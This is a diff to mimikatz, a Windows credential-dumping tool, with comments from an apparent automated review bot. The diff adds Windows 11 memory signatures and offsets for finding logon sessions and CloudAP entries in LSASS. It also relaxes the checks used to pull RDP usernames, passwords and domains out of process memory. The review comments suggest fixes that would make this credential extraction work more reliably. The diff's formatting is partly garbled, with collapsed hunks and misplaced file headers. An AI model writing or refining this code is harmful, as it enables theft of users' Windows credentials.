diff --git a/inc/globals.h b/inc/globals.h
index ea877781..44cace68 100644
--- a/inc/globals.h
+++ b/inc/globals.h
@@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_MIN_BUILD_7 7000
 #define KULL_M_WIN_MIN_BUILD_8 8000
 #define KULL_M_WIN_MIN_BUILD_BLUE 9400
-#define KULL_M_WIN_MIN_BUILD_10 9800
\ No newline at end of file
+#define KULL_M_WIN_MIN_BUILD_10 9800
+#define KULL_M_WIN_MIN_BUILD_11 22000
\ No newline at end of file
diff --git a/mimikatz/modules/kuhl_m_ts.c b/mimikatz/modules/kuhl_m_ts.c
index d0b94745..b67722d7 100644
--- a/mimikatz/modules/kuhl_m_ts.c
+++ b/mimikatz/modules/kuhl_m_ts.c
@@ -272,14 +272,13 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION { pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr; if( - (pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000)) + (pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000)) && (pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t))))) ) { - if( - (pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000)) + (pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000)) && (pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t))))) ) 
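Review bot: The relaxed alignment test on the Username.Buffer line (and likewise the Password line here and the Domain line in the next hunk) uses the bare literal `% 2` while the neighbouring Length check spells the same quantity as `sizeof(wchar_t)`; writing it as `!((ULONG_PTR) pWebKiwiData->Username.Buffer % sizeof(wchar_t))` documents that the field is now only required to be wchar_t-aligned and keeps the three conditions consistent. Loosening the accepted alignment from pointer size to two bytes admits more candidate positions in the scanned region, so a one-line comment stating which build's layout required the looser test would help the next reader understand why it was weakened. As collapsed here the hunk also shows the `if(` before the Password condition being removed with no replacement; if that is not a rendering artifact the inner block no longer parses. kuhl_m_ts_logonpasswords_MemoryAnalysis starts and ends outside the hunk.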
@@ -289,7 +288,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address); if( - (pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000)) + (pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000)) && (pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t))))) )
diff --git a/mimikatz/modules/ngc/kuhl_m_ngc.c b/mimikatz/modules/ngc/kuhl_m_ngc.c
index a62eac93..0445f1d5 100644
--- a/mimikatz/modules/ngc/kuhl_m_ngc.c
+++ b/mimikatz/modules/ngc/kuhl_m_ngc.c
@@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
 {
 if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
 {
- aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
+ aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
 if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
 {
 aRemote.address = containerManager.unk7;
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
index 536424e7..34d4b794 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
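Review bot: The replaced constant on the aRemote.address line of the kuhl_m_ngc.c hunk now carries its two predecessors inside a nested comment, `/*0xB4F90;//*0xbef10*/0xA7E60`, in the middle of the expression; that history belongs in version control, and the statement should read `aRemote.address = (PBYTE) iModule.DllBase.address + 0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near, NgcCtnrSvc.dll <version: placeholder>`. No build or module-version check is visible in this hunk, so on a module other than the one the offset was taken from the following kull_m_memory_copy reads an unrelated address and the copied containerManager is garbage; at minimum the comment should record which module version the constant corresponds to. kuhl_m_ngc_logondata starts and ends outside the hunk.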
@@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
 BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
 BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
+BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
 {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
@@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
 {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
 {KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
+ {KULL_M_WIN_MIN_BUILD_11, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
index b0d99cad..023e8163 100644
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
@@ -7,8 +7,10 @@ #if defined(_M_X64) BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75}; +BYTE PTRN_WN11_CloudApLocateLogonSession[] = {0x48, 0x8b, 0xd1, 0x49, 0x3b, 0xc1, 0x75}; KULL_M_PATCH_GENERIC CloudApReferences[] = { {KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}}, + {KULL_M_WIN_MIN_BUILD_11, {sizeof(PTRN_WN11_CloudApLocateLogonSession), PTRN_WN11_CloudApLocateLogonSession}, {0, NULL}, {-4}}, }; #elif defined(_M_IX86) BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x8b, 0x31, 0x39, 0x72, 0x10, 0x75};
diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
index 660a230e..7b20f46b 100644
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
@@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
 DWORD64 unk3;
 PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
 // ...
-} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
\ No newline at end of file
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
+
+typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
+ struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
+ struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
+ DWORD unk0;
+ DWORD unk1;
+ DWORD unk2;
+ LUID LocallyUniqueIdentifier;
+ DWORD unk3;
+ DWORD unk4;
+ DWORD unk5;
+ DWORD unk6;
+ PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
+ // ...
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
\ No newline at end of file
diff --git a/modules/kull_m_memory.c b/modules/kull_m_memory.c
index fcb7eb91..3451f0bf 100644
--- a/modules/kull_m_memory.c
+++ b/modules/kull_m_memory.c
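Review bot: In the new `_KIWI_CLOUDAP_LOGON_LIST_ENTRY_11` of the kuhl_m_sekurlsa_cloudap.h hunk, `Flink` and `Blink` are declared as `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *`, i.e. the pre-11 layout, even though this struct exists precisely because the 11 layout differs from the original; if the list is homogeneous, a walk through Flink lands on an entry whose fields are then read at the wrong offsets. They should be `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 *Flink;` and `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 *Blink;`. Nothing in this diff shows where the `_11` variant is selected over the original, so whether the new cloudap.c table row with offset `{-4}` drives that choice cannot be confirmed here; a comment on the struct naming the build it was observed on would help.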
@@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
 kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
 break;
 default:
+ SetLastError(ERROR_NOT_SUPPORTED);
 break;
 }
 return (Address->address) != NULL;
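Review bot: The added `SetLastError(ERROR_NOT_SUPPORTED);` in the `default:` case reports the failure through GetLastError, but the function's result on the last line is still `(Address->address) != NULL`; unless Address->address is cleared before the switch (not visible in this hunk), a caller passing a struct with a stale address gets TRUE for an unsupported memory type while the last error says otherwise. Clearing it in the same branch makes the two signals agree: `Address->address = NULL;` next to the SetLastError call. kull_m_memory_alloc starts outside the hunk.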